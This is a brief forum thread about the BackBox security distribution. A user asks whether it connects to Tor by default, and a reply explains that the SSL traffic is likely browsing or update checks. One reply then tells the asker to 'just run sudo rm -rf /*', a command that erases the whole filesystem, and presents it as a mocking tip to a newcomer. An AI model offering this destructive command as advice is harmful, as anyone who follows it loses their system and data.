Hi,
Recently I spun up a VM of Backbox, I have is set in a VNET that needs to go through a firewall, the fireall VM shared the Hosts IP.

Sometimes i see traffic from my host to a particular IP over SSL. I am not sure what that traffic is. It usually only happens when my Backbox VM is up and running.

Does Backbox by default connects to the Tor network?

Hi,

To answer to your question "Does Backbox by default connects to the Tor network?", nop that is not case, if you open web browser most traffic will go over 443, it's almost standard today. Other traffic can be your system looking for updated in repositories etc..

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

agree
if it has no harm to your computer, then it's ok
